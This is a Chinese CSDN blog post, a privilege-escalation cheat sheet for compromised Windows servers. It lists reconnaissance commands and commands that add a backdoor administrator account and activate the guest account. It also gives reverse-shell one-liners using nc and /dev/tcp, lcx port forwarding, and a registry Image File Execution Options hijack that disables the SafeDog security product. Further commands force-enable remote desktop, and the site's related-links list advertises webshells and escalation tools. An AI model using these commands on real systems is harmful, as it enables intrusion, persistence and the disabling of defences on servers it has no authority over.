提权辅助信息

最新推荐文章于 2023-09-27 10:44:20 发布
最新推荐文章于 2023-09-27 10:44:20 发布
阅读量224 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/somnuszhigang/article/details/88640037
版权

信息探测类

systeminfo :查看系统版本信息

netstat -ano : 查看系统开放端口

tasklist /svc : 查看系统进程

ipconfig : 查看ip地址

whoami : 查看当前用户

net user : 查看计算机用户列表

net localgroup : 查看计算机用户组列表

添加用户类

net user mstlab mstlab /add : 添加用户并设置密码

net localgroup administrators mstlab /add : 将用户加入管理组

net user guest /active:yes : 激活guest用户

net user guest mstlab : 更改guest用户的密码

反弹shell:

shell: nc -e cmd ip port
shell: bash -i >& /dev/tcp/ip/port 0>&1(linux)
服务器: nc -vv -lp port

端口转发:

shell: lcx -slave ip port 127.0.0.1 port
服务器: lcx -listen port 33891
ANTIFW.exe -s #运行程序,将3389转发到80
ANTIFW.exe -l #关闭程序,恢复iis

 

Kill Dog:

1.安全狗默认只拦截加管理组,不拦截加用户
  法a:利用用户克隆exp:直接克隆administrator的权限
  法b:反弹shell读取管理员密码
  法c:改注册表替换安全狗的文件,然后重启服务器(redegit /s redegit.reg(redegit.reg见附录))安全狗关闭
2.安全狗账号防护最严程度:拦截添加用户
  法a:激活guest,然后克隆用户
  法b:反弹shell读取管理员密码
  法c:改注册表,重启服务器,关闭安全狗
 

redegit.reg脚本内容:

Windows Registry Editor Version 5.00 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SafeDogGuardCenter.exe]
"Debugger"="C:\WWW\l.php"

 

开启的3389方法:

1.通用开3389(优化后):
  wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
2.For Win2003:
  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3.For Win2008:
  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
4.For Every:
  cmd开3389 win08 win03 win7 win2012 winxp
  win08,三条命令即可:
  wmic /namespace:\root\cimv2 erminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
  wmic /namespace:\root\cimv2 erminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
  win2012通用;win7前两条即可。权限需要run as administrator。


  查询终端端口 :

  REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
  (or) 终端端口:tasklist /svc查询TermService对应PID和netstat查询的PID对应的端口号
  (or) 注册表:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\ Wds dpwd\Tds cp 中PortNumber的值

 

QQ274028756
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
提权辅助工具ATRoot Auxiliary
05-15
ATRoot Auxiliary是一款针对Windows操作系统的提权辅助工具,主要用于网络安全领域的漏洞利用和权限提升。它由Java编程语言编写,这使得该工具具有跨平台性,不仅限于Windows环境,还能在Linux系统上运行,这对于多...
windows提权辅助在线平台
siu~
08-10 819
提权,网络术语,提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限。
[1]Windows IIS权限提权(一般aspx多一点)
司徒荆的博客
08-02 3256
Windows IIS权限提权(一般aspx多一点)
命令行强制开启3389服务支持server2008和2003
如鹿渴慕泉水的专栏
04-21 1万+
1.C:\Windows\System32\wbem\wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1 2.wmic /namespace:\\root\cimv2\terminalse
服务器提权常见方法介绍
seek_2022的博客
04-15 6689
文章目录一、提权常见的方法 很多时候渗透测试人员,在做渗透的时候,拿到了网站权限,会发现,网站的权限调用的CMD命令,其实只是网站的权限,并不是服务器管理员权限,这个时候就需要去想办法提升自己的权限,只有自己的权限够了,才可以去更好的做内网测试。 一、提权常见的方法 Windows常用的提权方式有:内核提权、数据库提权、系统配置错误提权策略首选项提权、Bypass UAC提权、令牌窃取提权等姿势。 1、windows/linux系统漏洞提权; 查看windows打了什么补丁,然后去网上找存在什么样的漏
【红队战术】Windows系统补丁提权辅助
黑剑
07-24 340
【需要将结果复制到】Windows提权辅助工具地址: https://i.hacking8.com/tiquan 根据查询结果在这两个项目上寻找相关的编号的EXP进行提权:该工具将目标补丁级别与 Microsoft 漏洞数据库进行比较,以检测目标上潜在的缺失补丁。它还会通知用户是否存在可用于缺失公告的公共漏洞和 Metasploit 模块。它需要 Windows 主机的“systeminfo”命令输出,以便比较 Microsoft 安全公告数据库并确定主机的补丁级别。它能够使用 --update 标志自动
linux-exploit-suggester Linux提权辅助脚本
01-25
收集Linux内核等相关信息,方便提权等操作
第03篇:提权辅助工具箱1
08-03
提权辅助工具详解】 在网络安全领域,提权是指攻击者获取系统中更高权限的过程,通常是为了扩大控制范围或执行更深层次的攻击。本篇文章主要介绍10款针对Linux和Windows系统的提权辅助工具,帮助安全研究人员或...
内网渗透测试-提权工具
05-25
SET主要用于社会工程学攻击,但也可以辅助提权。PETools是一个收集系统信息和执行提权脚本的集合,而LinEnum是一个详细的Linux系统枚举脚本,可以帮助发现可能的提权路径。 在内网渗透测试中,提权工具的使用通常...
星外主机提权大全
07-30
星外主机提权大全
ANTIFW.exe—停止IIS并将远程终端端口改为80的工具.zip
11-26
ANTIFW.exe—停止IIS并将远程终端端口3389改为80的工具.zip 原文载于http://123.42824.com/1977.html 对于一个过防火墙的方法写的程序(AntiFW.exe) 不知道原创是在什么地方看到了,一种比较bt的过防火墙的方式: 停掉IIS,把终端服务端口开到80. 就这个我写了个程序,请看: F:/C/AntiFW>AntiFW Usage:AntiFW [-s | -l] -s:to stop IIS,and set TS to port 80 -l:to logoff yourself and start IIS in a minute 1) AntiFW -s 这样IIS就被停掉,同时终端服务的端口被改成80 2) AntiFW -l 注销自己,并在两分钟之后把终端服务端口改到3389,同时启动IIS. 这样就能让网站还是活过来... 干掉IPSEC后仍然无法连接3389,就可以用到此工具,自动停止IIS将3389转到80上 工具的命令是在cmd下输入 antifw -s 运行程序 停止iis将3389改为80 antifw -l 关闭程序。恢复iis web服务器肯定不限制80端口的连接,所以开了防火墙也不会限制80…所以用这个你再开防火墙也没有用,嘎嘎。 下载地址:ANTIFW.exe—停止IIS并将远程终端端口改为80的工具
PHPwebshell提权源码
08-07
PHPwebshell提权源码 集合控制台 网路 链接 账户 打包 修改文件
aspx大马
09-14
aspdama
vip.aspx 提权的好工具
09-21
vip.aspx 提权的好工具vip.aspx 提权的好工具vip.aspx 提权的好工具vip.aspx 提权的好工具
Windows提权辅助工具WES-NG使用
最新发布
大河之犬的博客
09-27 331
Windows提权辅助工具WES-NG使用
渗透利器 | 提权辅助工具箱
热门推荐
03-25 2万+
作为技术宅的我,日常最大的爱好就是逛论坛。某日看到论坛里有一款基于主机的漏洞扫描工具,用来查找主机上公开EXP的CVE。嗯嗯,我想还是叫提权辅助工具可能...
linux提权辅助工具Linux_Exploit_Suggester(三种工具)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-11 2029
今天讲linux提权辅助工具三种之一Linux_Exploit_Suggester。Linux_Exploit_Suggester工具介绍,Linux_Exploit_Suggester是一款根据Linux操作系统版本号自动查找相应提权脚本的工具,旨在帮助检测给定 Linux 内核/基于 Linux 的机器的安全缺陷。 项目地址:https://github.com/mzet-/linux-exploit-suggester 对于工具检测出的每个漏洞,都会计算其存在的可能性: Highly prob
windows开启远程桌面命令
m0_48096446的博客
07-07 6482
开启远程桌面命令 #关闭远程桌面 #设置远程桌面端口(默认开启3389) 检查默认端口状态 非命令行打开方式 1、打开“控制面板”。怎么开启远程桌面连接详细教程 2、点击“系统”。怎么开启远程桌面连接详细教程 3、选择“远程设置”。怎么开启远程桌面连接详细教程 4、点击“远程”勾选“允许远程协助连接这台计算机”和“允许远程连接到此计算机”点击“确定”。怎么开启远程桌面连接详细教程 5、在任务栏搜索“远程桌面连接”并打开。怎么开启远程桌面连接详细教程 6、输入ip地址后点击“连接”即可...
shell 免杀aspx_发个免杀修改的aspx提权
weixin_35559202的博客
12-31 397
htmlPUBLIC"-//W3C//DTDXHTML1.0Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">protectedvoidPage_load(objectsender,EventArgse){stringok=Request.QueryString["s...
"高效的计算机辅助项目管理信息系统
本文主要介绍了计算机辅助项目管理的概述、主要任务、信息管理和文档管理等方面。 在概述部分,首先介绍了计算机辅助项目管理的概述。计算机辅助项目管理通过快速高效地处理项目产生的大量数据,提高信息处理的速度...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值